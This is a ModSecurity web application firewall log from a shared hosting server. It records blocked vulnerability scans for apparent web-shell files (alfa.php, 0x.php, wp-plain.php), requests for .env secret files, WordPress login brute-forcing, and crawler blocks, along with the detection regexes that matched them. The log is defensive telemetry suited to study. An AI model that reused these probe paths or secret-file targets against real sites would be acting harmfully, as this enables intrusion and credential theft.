[Tue May 26 17:47:17.051085 2026] [security2:error] [pid 924957:tid 925105] [client 4.228.83.111:38035] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/alfa.php"] [unique_id "ahWPTeYv2AvxeXULfJduFgAAABI"]
[Tue May 26 17:47:17.051189 2026] [security2:error] [pid 924957:tid 925105] [client 4.228.83.111:38035] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/alfa.php"] [unique_id "ahWPTeYv2AvxeXULfJduFgAAABI"]
[Tue May 26 17:47:18.441413 2026] [security2:error] [pid 924957:tid 925109] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPTeYv2AvxeXULfJduLwAAABY"]
[Tue May 26 17:47:19.190283 2026] [security2:error] [pid 924957:tid 925091] [client 3.136.26.66:61598] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWPTuYv2AvxeXULfJduRwAAAAQ"]
[Tue May 26 17:47:19.598843 2026] [security2:error] [pid 924957:tid 925103] [client 4.228.83.111:38044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/css.php"] [unique_id "ahWPT-Yv2AvxeXULfJduVgAAABA"]
[Tue May 26 17:47:19.598968 2026] [security2:error] [pid 924957:tid 925103] [client 4.228.83.111:38044] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/css.php"] [unique_id "ahWPT-Yv2AvxeXULfJduVgAAABA"]
[Tue May 26 17:47:20.172363 2026] [security2:error] [pid 924957:tid 925131] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPT-Yv2AvxeXULfJduXwAAACw"]
[Tue May 26 17:47:22.407078 2026] [security2:error] [pid 924957:tid 925181] [client 87.106.152.203:62812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.anujoverseas.in"] [uri "/images/images/cache.php"] [unique_id "ahWPUuYv2AvxeXULfJdupwAAAF4"], referer: www.google.com
[Tue May 26 17:47:22.634250 2026] [security2:error] [pid 924957:tid 925167] [client 4.228.83.111:38032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/classwithtostring.php"] [unique_id "ahWPUuYv2AvxeXULfJdurwAAAFA"]
[Tue May 26 17:47:22.634386 2026] [security2:error] [pid 924957:tid 925167] [client 4.228.83.111:38032] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/classwithtostring.php"] [unique_id "ahWPUuYv2AvxeXULfJdurwAAAFA"]
[Tue May 26 17:47:23.031516 2026] [security2:error] [pid 924957:tid 925146] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPUuYv2AvxeXULfJdurgAAADs"]
[Tue May 26 17:47:24.670001 2026] [security2:error] [pid 924957:tid 925210] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPVOYv2AvxeXULfJdu3AAAAHs"]
[Tue May 26 17:47:25.695783 2026] [security2:error] [pid 924957:tid 925207] [client 4.228.83.111:38025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/aa.php"] [unique_id "ahWPVeYv2AvxeXULfJdvAgAAAHg"]
[Tue May 26 17:47:25.695895 2026] [security2:error] [pid 924957:tid 925207] [client 4.228.83.111:38025] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/aa.php"] [unique_id "ahWPVeYv2AvxeXULfJdvAgAAAHg"]
[Tue May 26 17:47:26.210778 2026] [security2:error] [pid 924957:tid 925205] [client 4.228.83.111:45163] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/0x.php"] [unique_id "ahWPVuYv2AvxeXULfJdvDgAAAHY"]
[Tue May 26 17:47:26.210910 2026] [security2:error] [pid 924957:tid 925205] [client 4.228.83.111:45163] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/0x.php"] [unique_id "ahWPVuYv2AvxeXULfJdvDgAAAHY"]
[Tue May 26 17:47:26.930738 2026] [security2:error] [pid 924957:tid 925174] [client 4.228.83.111:45132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/k.php"] [unique_id "ahWPVuYv2AvxeXULfJdvHAAAAFc"]
[Tue May 26 17:47:26.930857 2026] [security2:error] [pid 924957:tid 925174] [client 4.228.83.111:45132] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/k.php"] [unique_id "ahWPVuYv2AvxeXULfJdvHAAAAFc"]
[Tue May 26 17:47:27.619319 2026] [security2:error] [pid 924957:tid 925165] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPV-Yv2AvxeXULfJdvLAAAAE4"]
[Tue May 26 17:47:27.690246 2026] [security2:error] [pid 924957:tid 925113] [client 4.228.83.111:38031] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/o.php"] [unique_id "ahWPV-Yv2AvxeXULfJdvMwAAABo"]
[Tue May 26 17:47:27.690353 2026] [security2:error] [pid 924957:tid 925113] [client 4.228.83.111:38031] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/o.php"] [unique_id "ahWPV-Yv2AvxeXULfJdvMwAAABo"]
[Tue May 26 17:47:27.719214 2026] [security2:error] [pid 924957:tid 925102] [client 87.106.152.203:64648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.anujoverseas.in"] [uri "/images/images/cache.php"] [unique_id "ahWPV-Yv2AvxeXULfJdvNQAAAA8"], referer: www.google.com
[Tue May 26 17:47:28.732376 2026] [security2:error] [pid 924957:tid 925121] [client 4.228.83.111:45124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/bb.php"] [unique_id "ahWPWOYv2AvxeXULfJdvUQAAACI"]
[Tue May 26 17:47:28.732510 2026] [security2:error] [pid 924957:tid 925121] [client 4.228.83.111:45124] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/bb.php"] [unique_id "ahWPWOYv2AvxeXULfJdvUQAAACI"]
[Tue May 26 17:47:29.899976 2026] [security2:error] [pid 924957:tid 925162] [client 20.151.111.128:2125] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWPWeYv2AvxeXULfJdvbQAAAEs"], referer: www.google.com
[Tue May 26 17:47:29.923862 2026] [security2:error] [pid 924957:tid 925167] [client 20.151.111.128:2429] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-plain.php"] [unique_id "ahWPWeYv2AvxeXULfJdvcgAAAFA"], referer: www.google.com
[Tue May 26 17:47:30.172852 2026] [security2:error] [pid 924957:tid 925143] [client 4.228.83.111:45144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/rip.php"] [unique_id "ahWPWuYv2AvxeXULfJdvfwAAADg"]
[Tue May 26 17:47:30.172983 2026] [security2:error] [pid 924957:tid 925143] [client 4.228.83.111:45144] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/rip.php"] [unique_id "ahWPWuYv2AvxeXULfJdvfwAAADg"]
[Tue May 26 17:47:30.504385 2026] [security2:error] [pid 924957:tid 925171] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPWuYv2AvxeXULfJdvfAAAAFQ"]
[Tue May 26 17:47:31.232120 2026] [security2:error] [pid 924957:tid 924967] [remote 167.172.25.98:53294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWPW-Yv2AvxeXULfJdvoQAAZgk"]
[Tue May 26 17:47:31.727791 2026] [security2:error] [pid 924957:tid 925077] [remote 165.22.95.96:42752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWPW-Yv2AvxeXULfJdvrgAAJ3c"]
[Tue May 26 17:47:31.856177 2026] [security2:error] [pid 924957:tid 924969] [remote 51.75.236.129:29684] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.srworldwide.in"] [uri "/robots.txt"] [unique_id "ahWPW-Yv2AvxeXULfJdvugAALws"]
[Tue May 26 17:47:31.856444 2026] [security2:error] [pid 924957:tid 925134] [client 51.75.236.129:29684] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.srworldwide.in"] [uri "/robots.txt"] [unique_id "ahWPW-Yv2AvxeXULfJdvugAALws"]
[Tue May 26 17:47:31.964174 2026] [security2:error] [pid 924957:tid 925181] [client 4.228.83.111:38034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/s.php"] [unique_id "ahWPW-Yv2AvxeXULfJdvwQAAAF4"]
[Tue May 26 17:47:31.964310 2026] [security2:error] [pid 924957:tid 925181] [client 4.228.83.111:38034] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/s.php"] [unique_id "ahWPW-Yv2AvxeXULfJdvwQAAAF4"]
[Tue May 26 17:47:32.167337 2026] [security2:error] [pid 924957:tid 925182] [client 20.151.111.128:2120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/fsxgswjl.php"] [unique_id "ahWPXOYv2AvxeXULfJdvxgAAAF8"], referer: www.google.com
[Tue May 26 17:47:32.316821 2026] [security2:error] [pid 924957:tid 925139] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPW-Yv2AvxeXULfJdvvAAAADQ"]
[Tue May 26 17:47:32.368615 2026] [security2:error] [pid 924957:tid 925171] [client 208.84.100.114:51868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env"] [unique_id "ahWPXOYv2AvxeXULfJdv4QAAAFQ"]
[Tue May 26 17:47:32.369435 2026] [security2:error] [pid 924957:tid 925156] [client 208.84.100.114:51918] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/backend/.env"] [unique_id "ahWPXOYv2AvxeXULfJdv6AAAAEU"]
[Tue May 26 17:47:32.369867 2026] [security2:error] [pid 924957:tid 925201] [client 208.84.100.114:51898] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/app/.env"] [unique_id "ahWPXOYv2AvxeXULfJdv5wAAAHI"]
[Tue May 26 17:47:32.377668 2026] [security2:error] [pid 924957:tid 925135] [client 208.84.100.114:51910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/api/.env"] [unique_id "ahWPXOYv2AvxeXULfJdv6QAAADA"]
[Tue May 26 17:47:33.316509 2026] [security2:error] [pid 924957:tid 924980] [remote 15.235.98.228:56962] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.srworldwide.in"] [uri "/"] [unique_id "ahWPXeYv2AvxeXULfJdwDAAAVxY"]
[Tue May 26 17:47:33.316768 2026] [security2:error] [pid 924957:tid 925174] [client 15.235.98.228:56962] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.srworldwide.in"] [uri "/"] [unique_id "ahWPXeYv2AvxeXULfJdwDAAAVxY"]
[Tue May 26 17:47:33.862599 2026] [security2:error] [pid 924957:tid 925123] [client 74.7.175.137:58436] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.redstudio.contabilidadecarioca.com.br"] [uri "/robots.txt"] [unique_id "ahWPXeYv2AvxeXULfJdwHQAAACQ"]
[Tue May 26 17:47:33.883128 2026] [security2:error] [pid 924957:tid 925204] [client 74.7.230.38:38574] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.redstudioanima.contabilidadecarioca.com.br"] [uri "/robots.txt"] [unique_id "ahWPXeYv2AvxeXULfJdwIAAAAHU"]
[Tue May 26 17:47:34.095328 2026] [security2:error] [pid 924957:tid 925213] [client 4.228.83.111:45165] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-content/admin.php"] [unique_id "ahWPXuYv2AvxeXULfJdwLAAAAH4"]
[Tue May 26 17:47:34.095475 2026] [security2:error] [pid 924957:tid 925213] [client 4.228.83.111:45165] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-content/admin.php"] [unique_id "ahWPXuYv2AvxeXULfJdwLAAAAH4"]
[Tue May 26 17:47:34.690697 2026] [security2:error] [pid 924957:tid 925198] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPXuYv2AvxeXULfJdwNQAAAG8"]
[Tue May 26 17:47:35.130321 2026] [security2:error] [pid 924957:tid 924997] [remote 161.97.109.81:39576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.109.97.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWPXuYv2AvxeXULfJdwSgAAdSc"]
[Tue May 26 17:47:36.154575 2026] [security2:error] [pid 924957:tid 925091] [client 51.77.74.125:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.veganfoodindia.moes-art.com"] [uri "/index.php"] [unique_id "ahWPX-Yv2AvxeXULfJdwWwAAAAQ"]
[Tue May 26 17:47:36.262922 2026] [security2:error] [pid 924957:tid 925096] [client 4.228.83.111:38059] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/gelay.php"] [unique_id "ahWPYOYv2AvxeXULfJdwdgAAAAk"]
[Tue May 26 17:47:36.263048 2026] [security2:error] [pid 924957:tid 925096] [client 4.228.83.111:38059] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/gelay.php"] [unique_id "ahWPYOYv2AvxeXULfJdwdgAAAAk"]
[Tue May 26 17:47:36.804210 2026] [security2:error] [pid 924957:tid 925186] [client 208.84.100.114:52098] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv1QAAAGM"]
[Tue May 26 17:47:36.916287 2026] [security2:error] [pid 924957:tid 925142] [client 208.84.100.114:52150] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv3QAAADc"]
[Tue May 26 17:47:36.946547 2026] [security2:error] [pid 924957:tid 925191] [client 208.84.100.114:52042] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdvzQAAAGg"]
[Tue May 26 17:47:36.953871 2026] [security2:error] [pid 924957:tid 925154] [client 208.84.100.114:52092] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv2QAAAEM"]
[Tue May 26 17:47:36.955401 2026] [security2:error] [pid 924957:tid 925161] [client 208.84.100.114:51974] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv6gAAAEo"]
[Tue May 26 17:47:37.015404 2026] [security2:error] [pid 924957:tid 925188] [client 185.191.171.4:26874] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-16th/day/2023-11-03/"] [unique_id "ahWPYeYv2AvxeXULfJdwjwAAAGU"]
[Tue May 26 17:47:37.015510 2026] [security2:error] [pid 924957:tid 925188] [client 185.191.171.4:26874] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-16th/day/2023-11-03/"] [unique_id "ahWPYeYv2AvxeXULfJdwjwAAAGU"]
[Tue May 26 17:47:37.122088 2026] [security2:error] [pid 924957:tid 925203] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPYOYv2AvxeXULfJdwfgAAAHQ"]
[Tue May 26 17:47:37.777092 2026] [security2:error] [pid 924957:tid 925125] [client 208.84.100.114:52134] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv2gAAACY"]
